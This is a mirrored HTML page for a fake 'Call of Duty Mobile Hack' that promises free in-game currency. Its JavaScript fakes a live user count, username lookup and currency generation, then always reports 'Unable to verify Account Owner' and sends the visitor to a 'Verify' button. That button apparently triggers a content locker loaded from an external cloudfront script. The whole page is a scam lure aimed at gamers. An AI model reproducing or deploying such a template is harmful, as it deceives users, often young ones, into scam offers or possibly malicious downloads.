<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>

	<script type="text/javascript">
		var NIBVj_jCH_iWZibc={"it":4021342,"key":"c9bed"};
	</script>
	<script src="https://d15skjf5hy9xr6.cloudfront.net/f97bd64.js"></script>

		<title>Call Of Duty </title>
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
		<meta name="description" content="Call of Duty Mobile Hack - wikimod.co" />    
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
		<link rel="icon" type="image/ico" href="img/favicon.ico" />
		<meta name="theme-color" content="#000000">
		<!-- Open Graph Meta Tags-->
		<meta property="og:title" content="Call of Duty Mobile Hack - wikimod.co" /> <!-- Title which is displayed when your site is shared on social networks -->
		<meta property="og:description" content="Call of Duty Mobile Hack - wikimod.co" /> <!-- Website description which is displayed when your site is shared on social networks -->
		<meta property="og:type" content="website" />
		<meta property="og:url" content="../../index.html" /> <!-- Your Website URL --><!-- Twitter Meta -->
		<!-- Icons -->
		<link rel="stylesheet" href="css/icon-font.min.css">
        <link rel="stylesheet" href="css/all2.css">
		<!-- Google Fonts -->
		<link href="https://fonts.googleapis.com/css?family=Poppins:300,400,700,900&amp;display=swap" rel="stylesheet">
		<!-- CSS -->
		<link href="css/bootstrap.min.css" rel="stylesheet" />  
		<link href="css/animate.css" rel="stylesheet" />
		<link href="css/style.css" rel="stylesheet" />
		<link href="css/sweetalert2.css" rel="stylesheet" />
		<script src="js/vanillatoasts.js"></script>
		<script src="js/live.js"></script>
		<link href="css/vanillatoasts.css" rel="stylesheet" />
		


		<style>
		input[type="value"]{
			font-size: 32px;
		}
		input[type="text"]{
		-moz-appearance: none;
		-webkit-appearance: none;
		-ms-appearance: none;
		appearance: none;
		background: #e7e7e7;
		border: 0;
		border-radius: 10px;
		color: #222222;
		display: block;
		outline: 0;
		padding: 0 1em;
		text-decoration: none;
		width: 100%;
		}
		input::-moz-focus-inner {
		border: 0;
		padding: 0;
		}
		input {
		color: #222222;
		font-size: 30px;
		font-weight: 600;
		letter-spacing: 0.025em;
		line-height: 1.65;
		}
		#spiner {
			font-size: 2.6em;
			display: block;
			text-align: center;
			margin: 20px auto;
			color: #8400ff;
		}
		.hide {
			display: none;
		}
		.swal2-popup {
			border-radius: 30px;
		}
		.float{
			position:fixed;
			width:55px;
			height:55px;
			bottom:40px;
			right:40px;
			background-color:#8400ff;
			color:#FFF;
			border-radius:50px;
			text-align:center;
			box-shadow: 2px 2px 3px #999;
		}
		.float:hover {
			color: #000;
			background-color: #fff;
		}
		.my-float{
			margin-top:19px;
		}
		strike {
			color: red;
		}
		</style>	
	</head>
	<body onload="create()">	
		<div id="bg"></div>
		<div class="overlay-pattern"></div>
		<div class="overlay"></div>
		<section class="app-download-section">
			<div class="container">
				<div class="app-download-wrapper animated flipInX">
					<div class="app-icon-wrapper">
						<div class="app-icon-inner-wrapper">
							<img src="img/profile.jpg" class="app-icon-img img-fluid" />
						</div>
					</div>
					<div class="app-download-content">
						<div class="app-download-content-header">
							<h1><span>Call Of Duty</span> • Free Cp •</h1>
							<span>• Server Europe East •</span> 
						</div>
						<div class="app-download-status">
							<div class="status-row row-first animated bounceIn animation-delay-400">
								<span class="status-label">Status:</span>
								<span id="status" class="status-dynamic">Online</span>
							</div>
							<div class="status-row row-second odd animated bounceIn animation-delay-600">
								<span class="status-label">Last Update:</span>
								<span id="date" class="status-dynamic"></span>
							</div>
							<div class="status-row row-last animated bounceIn animation-delay-800">
								<span class="status-label">Online Users:</span>
								<span id="online-count" class="status-dynamic"></span>
							</div>
						</div>
						<div id="control">
							<div class="app-download-main animated bounceIn">
								<p class="app-download-intro-text">Click on the button below to begin the modding process.</p>
								<div class="button-wrapper">
									<div id="b-1" onclick="nexT();playAu()" class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>Start Mod</span></div>
								</div>
								<div style="margin-top: 30px;">
									<p class="app-download-intro-text">To get started, we first need to mod the content into this app. This is a simple process, and you will only have to do this once to get access for life.</p>
								</div>
							</div>
						</div>
						<div id="show" class="hide">
							<div class="app-download-main animated bounceIn">
									<p class="app-download-intro-text">Username:</p>
								    <form action="javascript:void(0);">
										<input type="text" name="usernameInput" value="">
									</form>
									<br>
								<p class="app-download-intro-text">Choose Your Operating System:</p>
								<div class="field-wrapper platform-field-wrapper">
									<div id="devices">
									<div class="row small-margin">
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item platform-item-1">
												<i class="fab fa-android"></i>
												<span>Android</span>
											</div>
										</div>
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item platform-item-2">
												<i class="fab fa-apple"></i>
												<span>iOS</span>
											</div>
										</div>				
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item platform-item-2">
												<i class="fab fa-playstation"></i>
												<span>Playstation</span>
											</div>
										</div>
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item platform-item-2">
												<i class="fab fa-xbox"></i>
												<span>Xbox</span>
											</div>
										</div>
									</div>
									</div>
								</div>
						<br>
						<p class="app-download-intro-text">Select Amount:</p>
						<div id="currency">
								<div class="row small-margin">
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item1 platform-item-1">
												<img src="img/cp.png">
												<span>10,000 <br>(<strike>$10.99</strike>)</span>
											</div>
										</div>
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item1 platform-item-2">
												<img src="img/cp.png">
												<span>25,000 <br>(<strike>$27.99</strike>)</span>
											</div>
										</div>
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item1 platform-item-2">
												<img src="img/cp.png">
												<span>50,000 <br>(<strike>$42.99)</strike></span>
											</div>
										</div>
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item1 platform-item-2">
												<img src="img/cp.png">
												<span>100,000 <br>(<strike>$89.99</strike>)</span>
											</div>
										</div>
										
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item1 platform-item-1">
												<img src="img/cp.png">
												<span>250,000 <br>(<strike>$109.99</strike>)</span>
											</div>
										</div>
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item1 platform-item-2">
												<img src="img/cp.png">
												<span>500,000 <br>(<strike>$129.99</strike>)</span>
											</div>
										</div>
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item1 platform-item-2">
												<img src="img/cp.png">
												<span>750,000 <br>(<strike>$149.99)</strike></span>
											</div>
										</div>
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item1 platform-item-2">
												<img src="img/cp.png">
												<span>1,000,000 <br>(<strike>$179.99</strike>)</span>
											</div>
										</div>
										
										<div class="button-wrapper">
												<div id="b-2" onclick="playAu(); nexT1()" class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>Continue</span></div>
										</div>
								</div>
								</div>					
						</div>
						</div>
						<div id="verify" class="hide">
								<div class="app-download-main animated bounceIn">
									<p>You are almost done! Click the button below to load the apps needed for the final step of generating process.</p>
									<div id="spiner" class="fas fa-spinner fa-spin"></div>
									<div class="button-wrapper">
										<div onclick="_EQ()" class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>Verify</span></div>
										</div>
								</div>
						</div>
						</div>
						</div>
			</div>
		</section>
		<footer>
			<div class="container">
				<div class="footer-content">
					<p>&copy; 2022 • WebTea • Free App Tweaks & Mods</p>
				</div>
			</div>
		</footer>
		</a>
		<div class="X650d"></div>
		<audio id="myAudio">
			<source src="https://www.akawaw.com/sounds/click.ogg" type="audio/ogg">
			<source src="https://www.akawaw.com/sounds/click.mp3" type="audio/mpeg">
		</audio>
		<audio id="myAu">
			<source src="https://www.akawaw.com/sounds/choose.ogg" type="audio/ogg">
			<source src="https://www.akawaw.com/sounds/choose.mp3" type="audio/mpeg">
		</audio>
		<audio id="myAA">
			<source src="https://www.akawaw.com/sounds/success.ogg" type="audio/ogg">
			<source src="https://www.akawaw.com/sounds/success.mp3" type="audio/mpeg">
		</audio>
		<audio id="myerror">
			<source src="https://www.akawaw.com/sounds/error.ogg" type="audio/ogg">
			<source src="https://www.akawaw.com/sounds/error.mp3" type="audio/mpeg">
		</audio>

	</body>
	<!-- JS -->	
	<script>
		function random(min,max)
			{
				return Math.floor(Math.random()*(max-min+1)+min);
			}
		
			var initial = random(300, 400);
			var count = initial;
		
			setInterval(function() {
				var variation = random(-5,5);
		
				count += variation
				document.getElementById("online-count").innerHTML = count;
		
			}, 1000)
		</script>
		<script>
			var d = new Date();
			document.getElementById("date").innerHTML = d.toDateString();
		</script>
		<script>
		var z = document.getElementById("myAA");

function nexT() {
    let timerInterval;
    Swal.fire({
        timer: 3000,
        imageUrl: 'https://d266key948fg17.cloudfront.net/uploads/16860659937b6c63e10b16d11af236df23022f559f.gif',
        imageAlt: 'Loading',
        title: 'Loading',
        showConfirmButton: false,
        imageWidth: 50,  // Set the width to 100 pixels
        imageHeight: 50, // Set the height to 100 pixels
        onClose: () => {
            clearInterval(timerInterval);
        }
    
          }).then(function() {
			var x = document.getElementById("control");
			  if (x.style.display === "none") {
				x.style.display = "block";
			  } else {
					x.style.display = "none";
				}
			z.play();
			var element = document.getElementById("show");
			element.classList.remove("hide");
			Swal.fire({
			type: 'success',
			title: 'Start Mod Successfully',
			showConfirmButton: false,
			timer: 1500,
			onClose: () => {
              clearInterval(timerInterval)
            }
			})
			})
        }
		function nexT1() {
		let timerInterval
          Swal.fire({
            timer: 2000,
            imageUrl: 'https://d266key948fg17.cloudfront.net/uploads/16860659937b6c63e10b16d11af236df23022f559f.gif',
			imageAlt: 'Loading',
			title: 'Looking For Username',
			imageWidth: 50,  // Set the width to 100 pixels
        imageHeight: 50,
            showConfirmButton: false,
            onClose: () => {
              clearInterval(timerInterval)
            }

          }).then(function() {
			z.play();
			Swal.fire({
			type: 'success',
			title: 'Player found',
			showConfirmButton: false,
			timer: 1500,
			onClose: () => {
              clearInterval(timerInterval)
            }
			}).then(function() {
				Swal.fire({
				timer: 2000,
				imageUrl: 'https://d266key948fg17.cloudfront.net/uploads/16860659937b6c63e10b16d11af236df23022f559f.gif',
				imageAlt: 'Loading',
				title: 'Generating',
				imageWidth: 50,  // Set the width to 100 pixels
        imageHeight: 50,
				showConfirmButton: false,
				onClose: () => {
				clearInterval(timerInterval)
				}
				}).then (function(){
					z.play();
					Swal.fire({
					type: 'success',
					title: 'Resource Generated',
					showConfirmButton: false,
					timer: 1500,
					onClose: () => {
					clearInterval(timerInterval)
					}
					}).then(function() {
						Swal.fire({
						timer: 2000,
						imageUrl: 'https://d266key948fg17.cloudfront.net/uploads/16860659937b6c63e10b16d11af236df23022f559f.gif',
						imageAlt: 'Loading',
						title: 'Verifying',
						imageWidth: 50,  // Set the width to 100 pixels
        imageHeight: 50,
						showConfirmButton: false,
						onClose: () => {
						clearInterval(timerInterval)
						}
						}).then(function() {
							b.play();
							Swal.fire({
							type: 'error',
							title: 'Unable to verify Account Owner',
							showConfirmButton: false,
							timer: 1500,
							onClose: () => {
							clearInterval(timerInterval)
							}
							}).then(function(){
								var element = document.getElementById("show");
								element.classList.add("hide");
								var element1 = document.getElementById("verify");
								element1.classList.remove("hide");
							})
						})	
					})				
				})
			})
		})
        }
		</script>
      <script>
          // Add active class to the current button (highlight it)
          var header = document.getElementById("devices");
          var btns = header.getElementsByClassName("platform-item");
          for (var i = 0; i < btns.length; i++) {
            btns[i].addEventListener("click", function() {
            var current = document.getElementsByClassName("active");
            if (current.length > 0) { 
              current[0].className = current[0].className.replace(" active", "");
            }
            this.className += " active";
            });
          }
		</script>
		<script>
					// Add active class to the current button (highlight it)
					var header = document.getElementById("currency");
					var btns = header.getElementsByClassName("platform-item1");
					for (var i = 0; i < btns.length; i++) {
					  btns[i].addEventListener("click", function() {
					  var current = document.getElementsByClassName("active1");
					  if (current.length > 0) { 
						current[0].className = current[0].className.replace(" active1", "");
					  }
					  this.className += " active1";
					  });
					}
		</script>
		<script>
			var x = document.getElementById("myAudio"); 
			var y = document.getElementById("myAu")
			var z = document.getElementById("myAA")
			var b = document.getElementById("myerror")
			function playAu() { 
			  x.play(); 
			}
			function playA() {
			  y.play();
			}
			function playAA() {
			  z.play();
			}
			function playerror() {
			  b.play();
			}	 
			</script>
		<script src="js/jquery.min.html"></script>
		<script src="js/bootstrap.min.js"></script>
		<script src="js/sweetalert2.js"></script>

<!-- Mirrored from www.akawaw.com/ronda/callofduty/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 14 Oct 2023 16:56:50 GMT -->
</html>